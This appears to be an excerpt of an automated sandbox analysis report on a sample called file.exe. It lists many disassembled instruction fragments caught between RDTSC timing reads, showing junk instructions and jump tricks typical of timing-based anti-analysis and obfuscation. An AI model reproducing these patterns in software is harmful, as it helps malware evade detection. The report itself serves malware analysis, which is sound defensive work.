              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E375A second address: 8E376A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F92851B8946h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E717E second address: 8E7183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7183 second address: 8E719F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8952h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F92851B8946h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E719F second address: 8E71B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC96h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E71B9 second address: 8E71C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B14E1 second address: 8B14E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B15D6 second address: 8B15F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F92851B8954h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B16D7 second address: 8B1737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 js 00007F9284AFDC95h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F9284AFDC86h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F9284AFDC88h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov dword ptr [ebp+124503A1h], edi 0x0000003e push 2B5088E1h 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1737 second address: 8B173B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B197A second address: 8B19D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F9284AFDC93h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jg 00007F9284AFDC8Ah 0x00000016 mov eax, dword ptr [eax] 0x00000018 jbe 00007F9284AFDC8Ch 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F9284AFDC96h 0x00000030 jnc 00007F9284AFDC86h 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BAE second address: 8B1BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BB2 second address: 8B1BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BB8 second address: 8B1BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B8957h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BD3 second address: 8B1C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F9284AFDC88h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+1244CD6Fh], esi 0x0000002e push 00000004h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F9284AFDC88h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f jmp 00007F9284AFDC91h 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 jno 00007F9284AFDC86h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B242A second address: 8B2430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2430 second address: 8B24EE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D2BA9h], esi 0x00000015 lea eax, dword ptr [ebp+12485DC2h] 0x0000001b nop 0x0000001c je 00007F9284AFDC92h 0x00000022 jns 00007F9284AFDC8Ch 0x00000028 push eax 0x00000029 jp 00007F9284AFDC9Eh 0x0000002f jmp 00007F9284AFDC98h 0x00000034 nop 0x00000035 call 00007F9284AFDC8Fh 0x0000003a mov dword ptr [ebp+122D381Bh], esi 0x00000040 pop ecx 0x00000041 lea eax, dword ptr [ebp+12485D7Eh] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F9284AFDC88h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 mov edx, ecx 0x00000063 jl 00007F9284AFDC8Ch 0x00000069 add dword ptr [ebp+122D5AE9h], eax 0x0000006f or edi, dword ptr [ebp+12478B17h] 0x00000075 nop 0x00000076 jmp 00007F9284AFDC97h 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f pushad 0x00000080 popad 0x00000081 pushad 0x00000082 popad 0x00000083 popad 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B24EE second address: 8B24F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B24F3 second address: 892FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9284AFDC91h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F9284AFDC88h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov di, 607Ah 0x0000002b and edi, 4BCA7FDBh 0x00000031 call dword ptr [ebp+122D39F5h] 0x00000037 pushad 0x00000038 jnc 00007F9284AFDC88h 0x0000003e jng 00007F9284AFDC92h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7478 second address: 8E747C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E747C second address: 8E7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7482 second address: 8E74A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8954h 0x00000007 js 00007F92851B8948h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E74A8 second address: 8E74CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9284AFDC98h 0x0000000c jbe 00007F9284AFDC86h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E74CE second address: 8E74D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E77AD second address: 8E77B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E77B9 second address: 8E77E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Dh 0x00000007 jmp 00007F92851B8954h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E77E4 second address: 8E77E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7971 second address: 8E7975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7AE1 second address: 8E7B2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F9284AFDC9Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F9284AFDC95h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 js 00007F9284AFDC86h 0x0000001e jmp 00007F9284AFDC95h 0x00000023 popad 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7DED second address: 8E7DF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7DF2 second address: 8E7E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9284AFDC86h 0x0000000a jg 00007F9284AFDC86h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F9284AFDC97h 0x0000001d pop ebx 0x0000001e pushad 0x0000001f jmp 00007F9284AFDC8Dh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7E33 second address: 8E7E3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F92851B8946h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7E3E second address: 8E7E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7FD1 second address: 8E7FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F92851B8946h 0x00000009 jmp 00007F92851B8951h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7FED second address: 8E7FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F9284AFDC8Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0BD9 second address: 8F0BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5D7 second address: 8EF5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5DE second address: 8EF603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edi 0x0000000a jng 00007F92851B8990h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F92851B8951h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF603 second address: 8EF607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF772 second address: 8EF778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFA3B second address: 8EFA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFB84 second address: 8EFB88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFB88 second address: 8EFB8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFB8C second address: 8EFBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F92851B8946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B8955h 0x00000013 jg 00007F92851B8946h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFEFB second address: 8EFF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F003D second address: 8F0058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F92851B894Eh 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0619 second address: 8F0623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0623 second address: 8F0645 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F92851B8946h 0x00000008 jmp 00007F92851B8950h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F92851B8946h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0645 second address: 8F0659 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9284AFDC86h 0x00000008 jng 00007F9284AFDC86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF275 second address: 8EF27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF27F second address: 8EF284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF284 second address: 8EF29B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B894Dh 0x00000009 jbe 00007F92851B8946h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F2676 second address: 8F267A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6849 second address: 8F6867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F92851B8956h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6867 second address: 8F686D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F686D second address: 8F688F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F92851B8946h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B894Ch 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6A08 second address: 8F6A14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6C63 second address: 8F6C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8953h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6C7E second address: 8F6C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872E94 second address: 872E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872E9A second address: 872EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872EA3 second address: 872EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8E6E second address: 8F8E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8E74 second address: 8F8E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD1F2 second address: 8FD1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD613 second address: 8FD61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F92851B8946h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD61D second address: 8FD635 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F9284AFDC86h 0x00000012 je 00007F9284AFDC86h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD7C5 second address: 8FD7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F92851B8952h 0x0000000b jmp 00007F92851B8950h 0x00000010 jg 00007F92851B8946h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD945 second address: 8FD969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Fh 0x00000007 jnl 00007F9284AFDC86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007F9284AFDC86h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904625 second address: 90463C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B8951h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90463C second address: 904640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90301B second address: 90302D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F92851B8946h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90302D second address: 903031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903345 second address: 903395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F92851B8954h 0x0000000b jmp 00007F92851B8957h 0x00000010 pop ecx 0x00000011 jc 00007F92851B8952h 0x00000017 jmp 00007F92851B894Ah 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F92851B8946h 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9034D6 second address: 9034DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9034DE second address: 9034E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E30 second address: 8B1E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E3B second address: 8B1E5B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F92851B8954h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E5B second address: 8B1EB0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F9284AFDC88h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov ebx, dword ptr [ebp+12485DBDh] 0x00000028 sub edx, dword ptr [ebp+122D35ECh] 0x0000002e add eax, ebx 0x00000030 jmp 00007F9284AFDC8Fh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007F9284AFDC88h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1EB0 second address: 8B1EBA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F92851B894Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90431E second address: 904334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906CD2 second address: 906CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906CD6 second address: 906CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
